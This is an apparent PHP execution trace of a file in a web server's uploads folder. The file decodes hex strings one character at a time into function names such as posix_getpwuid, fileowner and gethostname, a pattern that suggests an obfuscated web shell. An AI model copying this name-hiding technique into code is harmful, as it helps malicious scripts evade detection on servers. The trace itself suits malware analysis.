2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	651	0	0.025707	721000	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'68'
3	651	1	0.025718	721048
3	651	R			104
3	652	0	0.025731	720968	chr	0		/var/www/html/uploads/1CTT.php	204	1	104
3	652	1	0.025742	721008
3	652	R			'h'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	653	0	0.025771	721000	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	653	1	0.025783	721048
3	653	R			95
3	654	0	0.025795	720968	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	654	1	0.025806	721008
3	654	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	655	0	0.025835	721000	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	655	1	0.025847	721048
3	655	R			97
3	656	0	0.025859	720968	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	656	1	0.025869	721008
3	656	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	657	0	0.025899	721000	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	657	1	0.025910	721048
3	657	R			108
3	658	0	0.025923	720968	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	658	1	0.025934	721008
3	658	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	659	0	0.025964	721000	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	659	1	0.025976	721048
3	659	R			108
3	660	0	0.025988	720968	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	660	1	0.025999	721008
3	660	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	632	1	0.026029	720968
2	632	R			'preg_match_all'
1		A						/var/www/html/uploads/1CTT.php	7	$func[32] = 'preg_match_all'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	661	0	0.026064	720968	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'706f7369785f6765747077756964'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 27
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	662	0	0.026109	721000	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	662	1	0.026121	721048
3	662	R			112
3	663	0	0.026134	720968	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	663	1	0.026145	721008
3	663	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	664	0	0.026176	721032	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	664	1	0.026187	721080
3	664	R			111
3	665	0	0.026199	721000	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	665	1	0.026211	721040
3	665	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	666	0	0.026241	721032	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	666	1	0.026253	721080
3	666	R			115
3	667	0	0.026265	721000	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	667	1	0.026276	721040
3	667	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	668	0	0.026307	721032	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	668	1	0.026318	721080
3	668	R			105
3	669	0	0.026330	721000	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	669	1	0.026341	721040
3	669	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	670	0	0.026371	721032	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'78'
3	670	1	0.026382	721080
3	670	R			120
3	671	0	0.026394	721000	chr	0		/var/www/html/uploads/1CTT.php	204	1	120
3	671	1	0.026405	721040
3	671	R			'x'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	672	0	0.026436	721032	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	672	1	0.026447	721080
3	672	R			95
3	673	0	0.026459	721000	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	673	1	0.026471	721040
3	673	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	674	0	0.026501	721032	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	674	1	0.026513	721080
3	674	R			103
3	675	0	0.026525	721000	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	675	1	0.026536	721040
3	675	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	676	0	0.026566	721032	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	676	1	0.026577	721080
3	676	R			101
3	677	0	0.026589	721000	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	677	1	0.026601	721040
3	677	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	678	0	0.026639	721040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	678	1	0.026650	721088
3	678	R			116
3	679	0	0.026662	721008	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	679	1	0.026673	721048
3	679	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	680	0	0.026703	721040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	680	1	0.026715	721088
3	680	R			112
3	681	0	0.026727	721008	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	681	1	0.026738	721048
3	681	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	682	0	0.026767	721040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'77'
3	682	1	0.026779	721088
3	682	R			119
3	683	0	0.026791	721008	chr	0		/var/www/html/uploads/1CTT.php	204	1	119
3	683	1	0.026802	721048
3	683	R			'w'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'w'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	684	0	0.026831	721040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	684	1	0.026846	721088
3	684	R			117
3	685	0	0.026859	721008	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	685	1	0.026870	721048
3	685	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	686	0	0.026899	721040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	686	1	0.026910	721088
3	686	R			105
3	687	0	0.026922	721008	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	687	1	0.026933	721048
3	687	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	688	0	0.026963	721040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	688	1	0.026974	721088
3	688	R			100
3	689	0	0.026987	721008	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	689	1	0.026997	721048
3	689	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	661	1	0.027027	721008
2	661	R			'posix_getpwuid'
1		A						/var/www/html/uploads/1CTT.php	7	$func[33] = 'posix_getpwuid'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	690	0	0.027062	721008	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'706f7369785f6765746772676964'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 27
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	691	0	0.027104	721040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	691	1	0.027115	721088
3	691	R			112
3	692	0	0.027128	721008	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	692	1	0.027139	721048
3	692	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	693	0	0.027169	721072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	693	1	0.027181	721120
3	693	R			111
3	694	0	0.027193	721040	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	694	1	0.027204	721080
3	694	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	695	0	0.027234	721072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	695	1	0.027245	721120
3	695	R			115
3	696	0	0.027258	721040	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	696	1	0.027269	721080
3	696	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	697	0	0.027299	721072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	697	1	0.027310	721120
3	697	R			105
3	698	0	0.027322	721040	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	698	1	0.027333	721080
3	698	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	699	0	0.027364	721072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'78'
3	699	1	0.027375	721120
3	699	R			120
3	700	0	0.027387	721040	chr	0		/var/www/html/uploads/1CTT.php	204	1	120
3	700	1	0.027398	721080
3	700	R			'x'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	701	0	0.027428	721072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	701	1	0.027440	721120
3	701	R			95
3	702	0	0.027452	721040	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	702	1	0.027463	721080
3	702	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	703	0	0.027493	721072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	703	1	0.027505	721120
3	703	R			103
3	704	0	0.027517	721040	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	704	1	0.027528	721080
3	704	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	705	0	0.027561	721072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	705	1	0.027574	721120
3	705	R			101
3	706	0	0.027586	721040	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	706	1	0.027597	721080
3	706	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	707	0	0.027626	721080	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	707	1	0.027638	721128
3	707	R			116
3	708	0	0.027650	721048	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	708	1	0.027661	721088
3	708	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	709	0	0.027690	721080	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	709	1	0.027702	721128
3	709	R			103
3	710	0	0.027714	721048	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	710	1	0.027724	721088
3	710	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	711	0	0.027754	721080	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	711	1	0.027765	721128
3	711	R			114
3	712	0	0.027777	721048	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	712	1	0.027789	721088
3	712	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	713	0	0.027818	721080	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	713	1	0.027830	721128
3	713	R			103
3	714	0	0.027842	721048	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	714	1	0.027853	721088
3	714	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	715	0	0.027885	721080	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	715	1	0.027896	721128
3	715	R			105
3	716	0	0.027908	721048	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	716	1	0.027972	721088
3	716	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	717	0	0.028005	721080	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	717	1	0.028017	721128
3	717	R			100
3	718	0	0.028029	721048	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	718	1	0.028041	721088
3	718	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	690	1	0.028070	721048
2	690	R			'posix_getgrgid'
1		A						/var/www/html/uploads/1CTT.php	7	$func[34] = 'posix_getgrgid'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	719	0	0.028106	721048	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'70617468696e666f'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 15
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	720	0	0.028147	721080	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	720	1	0.028158	721128
3	720	R			112
3	721	0	0.028171	721048	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	721	1	0.028182	721088
3	721	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	722	0	0.028212	721112	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	722	1	0.028223	721160
3	722	R			97
3	723	0	0.028236	721080	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	723	1	0.028247	721120
3	723	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	724	0	0.028277	721112	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	724	1	0.028288	721160
3	724	R			116
3	725	0	0.028300	721080	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	725	1	0.028312	721120
3	725	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	726	0	0.028346	721112	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'68'
3	726	1	0.028357	721160
3	726	R			104
3	727	0	0.028370	721080	chr	0		/var/www/html/uploads/1CTT.php	204	1	104
3	727	1	0.028381	721120
3	727	R			'h'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	728	0	0.028411	721112	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	728	1	0.028422	721160
3	728	R			105
3	729	0	0.028435	721080	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	729	1	0.028445	721120
3	729	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	730	0	0.028476	721112	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	730	1	0.028487	721160
3	730	R			110
3	731	0	0.028499	721080	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	731	1	0.028510	721120
3	731	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	732	0	0.028541	721112	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	732	1	0.028553	721160
3	732	R			102
3	733	0	0.028565	721080	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	733	1	0.028576	721120
3	733	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	734	0	0.028606	721112	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	734	1	0.028618	721160
3	734	R			111
3	735	0	0.028633	721080	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	735	1	0.028644	721120
3	735	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	719	1	0.028676	721088
2	719	R			'pathinfo'
1		A						/var/www/html/uploads/1CTT.php	7	$func[35] = 'pathinfo'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	736	0	0.028712	721088	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'66696c656f776e6572'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 17
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	737	0	0.028753	721120	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	737	1	0.028765	721168
3	737	R			102
3	738	0	0.028778	721088	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	738	1	0.028789	721128
3	738	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	739	0	0.028820	721152	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	739	1	0.028832	721200
3	739	R			105
3	740	0	0.028844	721120	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	740	1	0.028856	721160
3	740	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	741	0	0.028886	721152	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	741	1	0.028898	721200
3	741	R			108
3	742	0	0.028910	721120	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	742	1	0.028921	721160
3	742	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	743	0	0.028951	721152	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	743	1	0.028962	721200
3	743	R			101
3	744	0	0.028975	721120	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	744	1	0.028986	721160
3	744	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	745	0	0.029016	721152	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	745	1	0.029027	721200
3	745	R			111
3	746	0	0.029040	721120	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	746	1	0.029051	721160
3	746	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	747	0	0.029085	721152	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'77'
3	747	1	0.029096	721200
3	747	R			119
3	748	0	0.029108	721120	chr	0		/var/www/html/uploads/1CTT.php	204	1	119
3	748	1	0.029119	721160
3	748	R			'w'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'w'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	749	0	0.029149	721152	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	749	1	0.029161	721200
3	749	R			110
3	750	0	0.029173	721120	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	750	1	0.029183	721160
3	750	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	751	0	0.029213	721152	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	751	1	0.029225	721200
3	751	R			101
3	752	0	0.029237	721120	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	752	1	0.029248	721160
3	752	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	753	0	0.029278	721160	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	753	1	0.029289	721208
3	753	R			114
3	754	0	0.029302	721128	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	754	1	0.029313	721168
3	754	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	736	1	0.029343	721128
2	736	R			'fileowner'
1		A						/var/www/html/uploads/1CTT.php	7	$func[36] = 'fileowner'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	755	0	0.029378	721128	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'66696c6567726f7570'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 17
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	756	0	0.029419	721160	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	756	1	0.029431	721208
3	756	R			102
3	757	0	0.029444	721128	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	757	1	0.029455	721168
3	757	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	758	0	0.029486	721192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	758	1	0.029497	721240
3	758	R			105
3	759	0	0.029510	721160	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	759	1	0.029521	721200
3	759	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	760	0	0.029551	721192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	760	1	0.029563	721240
3	760	R			108
3	761	0	0.029575	721160	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	761	1	0.029587	721200
3	761	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	762	0	0.029617	721192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	762	1	0.029628	721240
3	762	R			101
3	763	0	0.029640	721160	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	763	1	0.029652	721200
3	763	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	764	0	0.029682	721192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	764	1	0.029693	721240
3	764	R			103
3	765	0	0.029705	721160	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	765	1	0.029716	721200
3	765	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	766	0	0.029745	721192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	766	1	0.029756	721240
3	766	R			114
3	767	0	0.029769	721160	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	767	1	0.029781	721200
3	767	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	768	0	0.029814	721192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	768	1	0.029826	721240
3	768	R			111
3	769	0	0.029838	721160	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	769	1	0.029849	721200
3	769	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	770	0	0.029879	721192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	770	1	0.029890	721240
3	770	R			117
3	771	0	0.029903	721160	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	771	1	0.029914	721200
3	771	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	772	0	0.029944	721200	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	772	1	0.029955	721248
3	772	R			112
3	773	0	0.029967	721168	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	773	1	0.029979	721208
3	773	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	755	1	0.030008	721168
2	755	R			'filegroup'
1		A						/var/www/html/uploads/1CTT.php	7	$func[37] = 'filegroup'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	774	0	0.030043	721168	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'66696c6574797065'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 15
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	775	0	0.030084	721200	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	775	1	0.030096	721248
3	775	R			102
3	776	0	0.030108	721168	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	776	1	0.030120	721208
3	776	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	777	0	0.030150	721232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	777	1	0.030162	721280
3	777	R			105
3	778	0	0.030174	721200	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	778	1	0.030185	721240
3	778	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	779	0	0.030215	721232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	779	1	0.030226	721280
3	779	R			108
3	780	0	0.030238	721200	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	780	1	0.030248	721240
3	780	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	781	0	0.030278	721232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	781	1	0.030290	721280
3	781	R			101
3	782	0	0.030302	721200	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	782	1	0.030314	721240
3	782	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	783	0	0.030344	721232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	783	1	0.030356	721280
3	783	R			116
3	784	0	0.030368	721200	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	784	1	0.030379	721240
3	784	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	785	0	0.030408	721232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'79'
3	785	1	0.030419	721280
3	785	R			121
3	786	0	0.030431	721200	chr	0		/var/www/html/uploads/1CTT.php	204	1	121
3	786	1	0.030442	721240
3	786	R			'y'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	787	0	0.030472	721232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	787	1	0.030483	721280
3	787	R			112
3	788	0	0.030495	721200	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	788	1	0.030510	721240
3	788	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	789	0	0.030540	721232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	789	1	0.030551	721280
3	789	R			101
3	790	0	0.030563	721200	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	790	1	0.030574	721240
3	790	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	774	1	0.030604	721208
2	774	R			'filetype'
1		A						/var/www/html/uploads/1CTT.php	7	$func[38] = 'filetype'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	791	0	0.030645	721208	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'676574686f73746e616d65'
